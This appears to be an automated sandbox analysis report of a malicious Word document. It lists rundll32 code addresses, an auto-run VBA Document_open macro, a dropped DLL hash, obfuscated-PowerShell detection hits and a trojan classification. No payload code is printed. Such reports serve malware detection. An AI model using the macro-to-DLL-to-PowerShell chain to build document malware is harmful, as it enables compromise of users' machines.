Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D8D1C	9_2_001D8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D7F1F	9_2_001D7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D511B	9_2_001D511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D2B16	9_2_001D2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CB112	9_2_001CB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D0F0C	9_2_001D0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D7D03	9_2_001D7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C153C	9_2_001C153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CBB3A	9_2_001CBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CF536	9_2_001CF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D0D33	9_2_001D0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CB75F	9_2_001CB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C6754	9_2_001C6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D2349	9_2_001D2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D8F49	9_2_001D8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D9B45	9_2_001D9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C8F78	9_2_001C8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C5B79	9_2_001C5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CE377	9_2_001CE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D1773	9_2_001D1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CC769	9_2_001CC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D0B68	9_2_001D0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C839D	9_2_001C839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C6D9F	9_2_001C6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C7998	9_2_001C7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CF98C	9_2_001CF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D878F	9_2_001D878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D9586	9_2_001D9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D6DB9	9_2_001D6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D61B8	9_2_001D61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C17AC	9_2_001C17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D73AC	9_2_001D73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C69A0	9_2_001C69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C9FDC	9_2_001C9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D1BDF	9_2_001D1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D71EF	9_2_001D71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D67E9	9_2_001D67E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CD7EB	9_2_001CD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D3FE7	9_2_001D3FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D31E2	9_2_001D31E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025B41F	10_2_0025B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00252C63	10_2_00252C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025EE78	10_2_0025EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025568E	10_2_0025568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00263895	10_2_00263895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025C0C6	10_2_0025C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002602C3	10_2_002602C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002642DA	10_2_002642DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00258736	10_2_00258736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00257B63	10_2_00257B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00264B41	10_2_00264B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002663C1	10_2_002663C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00254A35	10_2_00254A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00259A37	10_2_00259A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00252A30	10_2_00252A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00267A0F	10_2_00267A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0026340A	10_2_0026340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00265A61	10_2_00265A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0026687F	10_2_0026687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025F444	10_2_0025F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025EA4C	10_2_0025EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025E05A	10_2_0025E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002562A3	10_2_002562A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0026A0AF	10_2_0026A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002548BD	10_2_002548BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002560B9	10_2_002560B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002580BA	10_2_002580BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00251280	10_2_00251280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0026889D	10_2_0026889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002588E5	10_2_002588E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002612E2	10_2_002612E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002626F5	10_2_002626F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00251CFA	10_2_00251CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002620C5	10_2_002620C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002596CD	10_2_002596CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00268ADC	10_2_00268ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025F536	10_2_0025F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00260D33	10_2_00260D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025153C	10_2_0025153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025BB3A	10_2_0025BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00267D03	10_2_00267D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00260F0C	10_2_00260F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00262B16	10_2_00262B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025B112	10_2_0025B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00267F1F	10_2_00267F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00268D1C	10_2_00268D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00265D1D	10_2_00265D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0026511B	10_2_0026511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025C769	10_2_0025C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00260B68	10_2_00260B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025E377	10_2_0025E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00261773	10_2_00261773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00255B79	10_2_00255B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00258F78	10_2_00258F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00269B45	10_2_00269B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00262349	10_2_00262349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00268F49	10_2_00268F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00256754	10_2_00256754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025B75F	10_2_0025B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002569A0	10_2_002569A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002517AC	10_2_002517AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002673AC	10_2_002673AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002661B8	10_2_002661B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00266DB9	10_2_00266DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00269586	10_2_00269586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0026878F	10_2_0026878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025F98C	10_2_0025F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025839D	10_2_0025839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00256D9F	10_2_00256D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00257998	10_2_00257998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00263FE7	10_2_00263FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002631E2	10_2_002631E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002671EF	10_2_002671EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0025D7EB	10_2_0025D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002667E9	10_2_002667E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00261BDF	10_2_00261BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00259FDC	10_2_00259FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CB41F	11_2_002CB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C2C63	11_2_002C2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CEE78	11_2_002CEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C568E	11_2_002C568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D3895	11_2_002D3895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CC0C6	11_2_002CC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D02C3	11_2_002D02C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D42DA	11_2_002D42DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C8736	11_2_002C8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C7B63	11_2_002C7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D4B41	11_2_002D4B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D63C1	11_2_002D63C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C4A35	11_2_002C4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C9A37	11_2_002C9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C2A30	11_2_002C2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D7A0F	11_2_002D7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D340A	11_2_002D340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D5A61	11_2_002D5A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D687F	11_2_002D687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CEA4C	11_2_002CEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CF444	11_2_002CF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CE05A	11_2_002CE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002DA0AF	11_2_002DA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C62A3	11_2_002C62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C48BD	11_2_002C48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C60B9	11_2_002C60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C80BA	11_2_002C80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C1280	11_2_002C1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D889D	11_2_002D889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C88E5	11_2_002C88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D12E2	11_2_002D12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C1CFA	11_2_002C1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D26F5	11_2_002D26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C96CD	11_2_002C96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D20C5	11_2_002D20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D8ADC	11_2_002D8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C153C	11_2_002C153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CBB3A	11_2_002CBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CF536	11_2_002CF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D0D33	11_2_002D0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D0F0C	11_2_002D0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D7D03	11_2_002D7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D5D1D	11_2_002D5D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D8D1C	11_2_002D8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D7F1F	11_2_002D7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D511B	11_2_002D511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D2B16	11_2_002D2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CB112	11_2_002CB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CC769	11_2_002CC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D0B68	11_2_002D0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C8F78	11_2_002C8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C5B79	11_2_002C5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CE377	11_2_002CE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D1773	11_2_002D1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D2349	11_2_002D2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D8F49	11_2_002D8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D9B45	11_2_002D9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CB75F	11_2_002CB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C6754	11_2_002C6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C17AC	11_2_002C17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D73AC	11_2_002D73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C69A0	11_2_002C69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D6DB9	11_2_002D6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D61B8	11_2_002D61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CF98C	11_2_002CF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D878F	11_2_002D878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D9586	11_2_002D9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C839D	11_2_002C839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C6D9F	11_2_002C6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C7998	11_2_002C7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D71EF	11_2_002D71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D67E9	11_2_002D67E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002CD7EB	11_2_002CD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D3FE7	11_2_002D3FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D31E2	11_2_002D31E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002C9FDC	11_2_002C9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002D1BDF	11_2_002D1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BB41F	12_2_001BB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BEE78	12_2_001BEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B2C63	12_2_001B2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C3895	12_2_001C3895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B568E	12_2_001B568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C42DA	12_2_001C42DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BC0C6	12_2_001BC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C02C3	12_2_001C02C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B8736	12_2_001B8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C4B41	12_2_001C4B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B7B63	12_2_001B7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C63C1	12_2_001C63C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C7A0F	12_2_001C7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C340A	12_2_001C340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B2A30	12_2_001B2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B9A37	12_2_001B9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B4A35	12_2_001B4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BE05A	12_2_001BE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BEA4C	12_2_001BEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BF444	12_2_001BF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C687F	12_2_001C687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C5A61	12_2_001C5A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C889D	12_2_001C889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B1280	12_2_001B1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B80BA	12_2_001B80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B60B9	12_2_001B60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B48BD	12_2_001B48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001CA0AF	12_2_001CA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B62A3	12_2_001B62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C8ADC	12_2_001C8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B96CD	12_2_001B96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C20C5	12_2_001C20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B1CFA	12_2_001B1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C26F5	12_2_001C26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B88E5	12_2_001B88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C12E2	12_2_001C12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C8D1C	12_2_001C8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C5D1D	12_2_001C5D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C7F1F	12_2_001C7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C511B	12_2_001C511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BB112	12_2_001BB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C2B16	12_2_001C2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C0F0C	12_2_001C0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C7D03	12_2_001C7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BBB3A	12_2_001BBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B153C	12_2_001B153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BF536	12_2_001BF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C0D33	12_2_001C0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BB75F	12_2_001BB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B6754	12_2_001B6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C8F49	12_2_001C8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C2349	12_2_001C2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C9B45	12_2_001C9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B5B79	12_2_001B5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B8F78	12_2_001B8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BE377	12_2_001BE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C1773	12_2_001C1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BC769	12_2_001BC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C0B68	12_2_001C0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B7998	12_2_001B7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B6D9F	12_2_001B6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B839D	12_2_001B839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C878F	12_2_001C878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BF98C	12_2_001BF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C9586	12_2_001C9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C61B8	12_2_001C61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C6DB9	12_2_001C6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C73AC	12_2_001C73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B17AC	12_2_001B17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B69A0	12_2_001B69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C1BDF	12_2_001C1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001B9FDC	12_2_001B9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001BD7EB	12_2_001BD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C71EF	12_2_001C71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001C67E9	12_2_001C67E9

Source: info.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Sjtq5nhmztw, Function Document_open			Name: Document_open

Source: info.doc

OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\user\Xts_nmf\P4188qk\U95D.dll 7A045B94A661BA72BD4EC82E99032232C195E7249A386CA04C3349FA8A977B8C

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10029D17 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10026566 appears 66 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100040F0 appears 118 times

Source: 00000005.00000002.2086257374.0000000001C56000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2086147176.0000000000336000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: U95D.dll.5.dr

Static PE information: Section: .rsrc ZLIB complexity 0.995798093463

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@36/7@1/4

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$info.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC0A0.tmp

Jump to behavior

Source: info.doc

OLE indicator, Word Document stream: true

Source: info.doc	OLE document summary: title field not present or empty
Source: info.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............U........................... ...............................................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............U...,...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.......L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................x...............................x.....................`I.........v.....................K........S.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0................................3e..... .........u.............}..v....(....... ...............................,...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................>Q.j..... u...............u.............}..v............0.................S.............,...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................Q.j......................u.............}..v............0...............................,...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................Q.j......S...............u.............}..v............0...............x.S.............,...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................Q.j......................u.............}..v............0...............................,...............	Jump to behavior
